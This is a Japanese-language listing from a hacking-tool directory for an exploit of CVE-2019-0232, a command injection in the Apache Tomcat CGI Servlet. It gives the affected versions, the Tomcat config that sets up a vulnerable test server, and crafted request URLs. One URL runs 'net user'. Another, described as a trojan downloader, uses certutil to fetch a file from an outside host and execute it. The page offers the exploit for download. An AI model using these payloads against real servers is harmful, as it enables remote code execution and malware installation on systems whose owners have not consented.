Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-0232-EXP — Apache Tomcat CGI Servletのコマンドインジェクション(CVE-2019-0232)を悪用し、影響を受けるバージョンに対して巧妙に細工されたHTTPリクエストによりリモートコード実行を可能にするエクスプロイト。 | Kitploit
ツール/GitHubGitHub/cyy95/cve-2019-0232-exp
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用コマンド&コントロール
GitHubcyy95/cve-2019-0232-exp

CVE-2019-0232-EXP

Apache Tomcat CGI Servletのコマンドインジェクション(CVE-2019-0232)を悪用し、影響を受けるバージョンに対して巧妙に細工されたHTTPリクエストによりリモートコード実行を可能にするエクスプロイト。

リポジトリを見る
337年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2019-0232-EXP

テスト環境はWin10 Home 1809、jreバージョンは18.3 (build 10.0.2+13)、Tomcatバージョンは9.0.13。

影響を受けるTomcatバージョン

★Apache Tomcat 9.0.0.M1 to 9.0.17
★Apache Tomcat 8.5.0 to 8.5.39
★Apache Tomcat 7.0.0 to 7.0.93

conf/web.xmlの設定

root@kitploit:~
<servlet>
    <servlet-name>cgi</servlet-name>
    <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
    <init-param>
      <param-name>cgiPathPrefix</param-name>
      <param-value>WEB-INF/cgi-bin</param-value>
    </init-param>
    <init-param>
      <param-name>enableCmdLineArguments</param-name>
      <param-value>true</param-value>
    </init-param>
    <init-param>
      <param-name>executable</param-name>
      <param-value></param-value>
    </init-param>
    <load-on-startup>5</load-on-startup>
</servlet>

Servletマッピングの設定:

root@kitploit:~
<servlet-mapping>
        <servlet-name>cgi</servlet-name>
        <url-pattern>/cgi-bin/*</url-pattern>
</servlet-mapping>

conf/context.xmlの設定

privileged="true"属性を追加

root@kitploit:~
<Context privileged="true">
   <WatchedResource>WEB-INF/web.xml</WatchedResource>
   <WatchedResource>WEB-INF/tomcat-web.xml</WatchedResource>
   <WatchedResource>${catalina.base}/conf/web.xml</WatchedResource>
</Context>

最後にwebapps/ROOT/WEB-INFフォルダにhello.bat空ファイルを作成し、中には何も書かなくてよい。 Tomcatを起動し、ブラウザを開いて以下のリンクにアクセス: http://localhost:8080/cgi-bin/hello.bat?&C%3a%5cWindows%5cSystem32%5Cnet+user

インジェクションテスト

脆弱性悪用シナリオ

インジェクションリンクを構築し、画像(トロイの木馬)ダウンローダーの機能を実現する: http://localhost:8080/cgi-bin/hello.bat?&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3a%2f%2fb.hiphotos.baidu.com%2fimage%2fpic%2fitem%2f9825bc315c6034a8ef5250cec5134954082376c9.jpg+1.jpg+%26start+1.jpg

画像ダウンローダー

ツールをダウンロード